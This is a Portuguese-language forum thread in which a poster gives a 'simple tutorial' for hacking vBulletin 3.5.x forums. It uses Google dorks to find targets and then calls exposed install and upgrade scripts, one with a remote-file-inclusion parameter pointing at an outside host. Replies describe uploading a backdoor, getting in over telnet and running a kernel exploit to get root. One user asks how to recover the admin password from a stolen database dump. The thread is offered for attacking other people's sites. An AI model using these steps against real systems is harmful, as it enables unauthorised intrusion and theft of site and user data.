Hackear vBulletin 3.5.4

[Anonymous]

##Hackear vBulletin Simples tutorial

1) Procurar no google;

"Powered By vBulletin"
"Powered By vBulletin 3.5.*"

2) Quando tiver um alvo;

    exemplo : www.site.com/vBulletin/index.php
   
    Checar se há > Install :

    exemplo: www.site.com/vBulletin/install/

3) Inserir o código;
 
    exemplo : www.site.com/vBulletin/install/finalupgrade.php?step=5
ou exemplo : www.site.com/vBulletin/install/tableprefix.php
ou   exemplo: www.site.com/vBulletin/install/upgrade_ ... //hack.com

IMAGEM

Simples não?

Juízo e bom senso.

[Nêmesis]

Ae Storm .. muito bom !!
Não conhecia esse bug ainda =P

Té +

[Anonymous]

Ae Storm .. muito bom !!
Não conhecia esse bug ainda =P

Faço minha, as palavras do Nêmesis.

Bjos pra vc amigo Storm :-*

[HadeS]

=|

Isso não é bem um bug. Só que os super-inteligentes dos administradores não excluíram o arquivo da instalação do vBulletin. Isso acontece em qualquer sistema de fórum, phpBB, IPB, vBulletin, SMF, etc.

HadeS

[slul]

=|

Isso não é bem um bug. Só que os super-inteligentes dos administradores não excluíram o arquivo da instalação do vBulletin. Isso acontece em qualquer sistema de fórum, phpBB, IPB, vBulletin, SMF, etc.

HadeS

Mas pode ser considerada uma falha no sistema

Tem formas de negar que a instalação seja feita depois que jah foi instalada

tipo eh soh ver se existem tabelas no mysql com o nome das tabelas que o programa de instalação cria

Abraços HadeS

[Anonymous]

=|

Isso não é bem um bug. Só que os super-inteligentes dos administradores não excluíram o arquivo da instalação do vBulletin. Isso acontece em qualquer sistema de fórum, phpBB, IPB, vBulletin, SMF, etc.

HadeS

Nunca falei que se tratava de um bug, tanto é que coloquei em 'vulnerabilidades' coloquei para ajudar  quem está começando a aprender a ter acesso a websites de uma forma mais 'simples', para mim é só mais uma forma de aprendizagem, tanto que achei centenas de websites com essa falha porém não fiz nada, so mesmo a aprendizagem,porém mesmo assim recebo críticas.

Mas pode ser considerada uma falha no sistema

Tem formas de negar que a instalação seja feita depois que jah foi instalada

tipo eh soh ver se existem tabelas no mysql com o nome das tabelas que o programa de instalação cria

Abraços HadeS

Pois é, tanto é que existe o vBulletin bem configurado que pede uma key para sua instalação ou um password.

[#phobia]

Ae Storm, muito bom essa ae kra... Não sabia.

vlw ae velho!!! 

[Skayler]

@Storm.

Onde lhe criticaram?
Não ví ninguém lhe criticando.

[]'s


Skayler

[Anonymous]

se você procurar algum site com pafiledb vc entrar no arquivo upgrade.php eh quase a mesma coisa, mas soh que axo qe naum tem jeito di mudar ah senha do administrador

[Security]

www.site.com/vBulletin/install/upgrade_ ... //hack.com

tpw esse step=http://hack.com
eu ponho uq no lugar desse hack.com :S?
pq na imagem ta apagado
http://img101.imageshack.us/img101/316/lolssss0oj.jpg
flw

[slul]

www.site.com/vBulletin/install/upgrade_ ... //hack.com

tpw esse step=http://hack.com
eu ponho uq no lugar desse hack.com :S?
pq na imagem ta apagado
http://img101.imageshack.us/img101/316/lolssss0oj.jpg
flw

Pelo o que eu entendi o bug eh um RFI ou Remote File Inlcusion

Sendo assim o mais correto era colocar uma CMD e tentar uploadear um backdoor pra linux....

depois de isso feito entre via telnet na maquina e baixe um exploit para o kernel utilizado

pronto vc rootou

[Anonymous]

pode ate funcionar
mas eh mto dificil axar um q ainda esteja com u index do install

[alissonvn]

viw,e como que eu consigo descobrir a senha depois que eu peguei o "vbulletin.sql",eu abro pelo bloco de notas mais naum sei onde está a senha,por favor ajuda aew,vlw